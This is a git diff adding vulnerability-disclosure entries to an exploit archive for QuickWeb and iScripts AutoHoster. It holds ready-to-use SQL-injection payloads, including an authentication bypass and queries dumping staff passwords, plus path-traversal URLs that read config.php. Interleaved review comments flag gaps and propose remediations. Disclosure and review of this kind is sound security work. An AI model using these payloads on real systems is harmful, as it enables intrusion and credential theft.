diff --git a/files.csv b/files.csv
index d7b5aa947..a10d6b3e2 100755
--- a/files.csv
+++ b/files.csv
@@ -35147,3 +35147,13 @@ id,file,description,date,author,platform,type,port
 38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download Vulnerability",2013-12-11,"Daniel Godoy",php,webapps,0
 38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0
 38882,platforms/cgi/webapps/38882.txt,"Icinga cgi/config.c process_cgivars Function Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0
+38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0
+38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 login.asp Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0
+38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster /checktransferstatus.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster /checktransferstatusbck.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster /payinvoiceothers.php invno Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster /support/parser/main_smtp.php Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
+38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster /admin/downloadfile.php fname Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
diff --git a/platforms/asp/webapps/38883.txt b/platforms/asp/webapps/38883.txt
new file mode 100755
index 000000000..0b10cbe6a
--- /dev/null
+++ b/platforms/asp/webapps/38883.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64371/info
+
+EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/dweb/apps/news-events/newdetail.asp?id=1=[SQL INJECTION]
\ No newline at end of file
diff --git a/platforms/asp/webapps/38884.txt b/platforms/asp/webapps/38884.txt
new file mode 100755
index 000000000..9a950f717
--- /dev/null
+++ b/platforms/asp/webapps/38884.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64371/info
+
+EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.
+
+www.example.com/dweb/login.asp
+
+UserID : x' or ' 1=1--
+Password : x' or ' 1=1--
\ No newline at end of file
diff --git a/platforms/php/webapps/38885.txt b/platforms/php/webapps/38885.txt
new file mode 100755
index 000000000..9562b05a4
--- /dev/null
+++ b/platforms/php/webapps/38885.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+
+/checktransferstatus.php
+Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337
+Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337
+Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337
\ No newline at end of file
diff --git a/platforms/php/webapps/38886.txt b/platforms/php/webapps/38886.txt
new file mode 100755
index 000000000..fd010d43d
--- /dev/null
+++ b/platforms/php/webapps/38886.txt
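Review bot: The advisory text in platforms/php/webapps/38885.txt never names an affected iScripts AutoHoster version, whereas the EtoShop entries 38883 and 38884 state `1.0.0 is vulnerable; other versions may also be affected`; the same gap is present in 38886 through 38892. Without a version line a reader cannot tell whether a deployed copy is in scope. I would add a line after the description such as `iScripts AutoHoster <VERSION_TESTED> is vulnerable; other versions may also be affected.`, with the version taken from the original report. Since the `cmbdomain` lines read `vPassword`, `vLogin` and `vMail` from `autohoster_staffs`, the entry would also benefit from one sentence saying that the parameter must be bound in a parameterized query and that staff credentials on exposed installs should be rotated.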
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+
+/checktransferstatusbck.php
+Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337
+Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337
+Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337
\ No newline at end of file
diff --git a/platforms/php/webapps/38887.txt b/platforms/php/webapps/38887.txt
new file mode 100755
index 000000000..580485576
--- /dev/null
+++ b/platforms/php/webapps/38887.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+
+Time based Blind Injection
+/additionalsettings.php
+Post : submit=faris&cmbdomain=%Inject_Here%
\ No newline at end of file
diff --git a/platforms/php/webapps/38888.txt b/platforms/php/webapps/38888.txt
new file mode 100755
index 000000000..dc980bceb
--- /dev/null
+++ b/platforms/php/webapps/38888.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+
+/payinvoiceothers.php
+invno=%Inject_Here%
\ No newline at end of file
diff --git a/platforms/php/webapps/38889.txt b/platforms/php/webapps/38889.txt
new file mode 100755
index 000000000..9b3eb0177
--- /dev/null
+++ b/platforms/php/webapps/38889.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+
+/support/parser/main_smtp.php
+^
+Just light sandwitch before the fatty food :))
\ No newline at end of file
diff --git a/platforms/php/webapps/38890.txt b/platforms/php/webapps/38890.txt
new file mode 100755
index 000000000..3a1a8775c
--- /dev/null
+++ b/platforms/php/webapps/38890.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+
+/websitebuilder/showtemplateimage.php
+include_once "includes/session.php";
+include_once "includes/function.php";
+$templateid = $_GET['tmpid'];
+$type = $_GET['type'];
+if ($type == "home") {
+ $imagename = "homepageimage.jpg";
+} else if($type == "sub") {
+ $imagename = "subpageimage.jpg";
+} else {
+ $imagename = "thumpnail.jpg";
+}
+readfile("./".$_SESSION["session_template_dir"]."/".$templateid."/$imagename");
+Hmmm , we can cancel the imagename value via the null byte %00
+[+] Exploit : /websitebuilder/showtemplateimage.php?tmpid=../../includes/config.php%00&type=sub
\ No newline at end of file
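Review bot: platforms/php/webapps/38889.txt gives only the path `/support/parser/main_smtp.php`, followed by `^` and a joke line, so nothing in the entry says which input is affected or what the flaw is; files.csv can only title it `Unspecified Traversal`. A defender cannot derive a detection rule or a fix from this. I would replace the last two lines with a one-line statement of the affected parameter and the observed behaviour, taken from the original report, or hold the entry back until that detail is available.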
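Review bot: The `%00` step described after the quoted `readfile(...)` call in platforms/php/webapps/38890.txt only holds on PHP builds that still accept NUL bytes in filesystem paths (rejected since PHP 5.3.4), and the entry does not say so. The unchecked `../` in `tmpid` is the underlying defect and does not depend on the PHP version. I would add a line such as `Note: the %00 truncation requires PHP < 5.3.4; tmpid is still used unvalidated in the path on later versions.` For readers fixing the script, `$templateid` has to be constrained before `readfile()`, for example `if (!ctype_digit($templateid)) { http_response_code(400); exit; }`, assuming template ids are numeric, which the entry does not show.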
diff --git a/platforms/php/webapps/38891.txt b/platforms/php/webapps/38891.txt
new file mode 100755
index 000000000..6464dd8e8
--- /dev/null
+++ b/platforms/php/webapps/38891.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+
+/admin/downloadfile.php > probably injected by the Guy who nulled the script (thank u any way ;p)
+$filename = urldecode($_GET['fname']);
+header("content-disposition:attachment;filename=$filename");
+readfile($filename)
+no need to cancel any thing , just beat it bro ;)
+[+] Exploit : /admin/downloadfile.php?fname=../includes/config.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38892.txt b/platforms/php/webapps/38892.txt
new file mode 100755
index 000000000..6b4b4c3f9
--- /dev/null
+++ b/platforms/php/webapps/38892.txt
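Review bot: The first content line of platforms/php/webapps/38891.txt says `/admin/downloadfile.php` was `probably injected by the Guy who nulled the script`, meaning the file may come from a pirated copy rather than the vendor package, yet files.csv lists it as an iScripts AutoHoster flaw without that caveat. The entry should state which distribution was tested, so that defenders know whether to look for a vendor bug or for a planted file. In the quoted code, `$_GET['fname']` is run through `urldecode()` a second time (PHP has already decoded it) and then reaches both `header()` and `readfile()` unchecked. The remediation worth recording is an allowlist of downloadable names, with `basename()` applied before either call.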
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+
+/support/admin/csvdownload.php
+ $filename="../csvfiles/".addslashes($_GET["id"]).".txt";
+ header('Content-Description: File Transfer');
+ header('Content-Type: application/force-download');
+ header('Content-Length: ' . filesize($filename));
+ header('Content-Disposition: attachment; filename=' . basename($filename));
+ readfile($filename);
+[+] Exploit : /support/admin/csvdownload.php?id=../../includes/config.php%00
\ No newline at end of file
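Review bot: The quoted `csvdownload.php` code passes `id` through `addslashes()`, which leaves `../` untouched but escapes a NUL byte into the two characters `\0`, so the `%00` in the `[+] Exploit` line would not cut off the `.txt` suffix unless something not shown in the excerpt undoes that escaping. As quoted, the traversal appears limited to files ending in `.txt`; the entry should either show what makes the truncation work or have its description and files.csv title narrowed accordingly. For the fix, `addslashes()` is a quoting helper and not a path check. The code needs `$id = basename($_GET['id']);` and a `realpath()` comparison against the `csvfiles` directory before `filesize()` and `readfile()` are called.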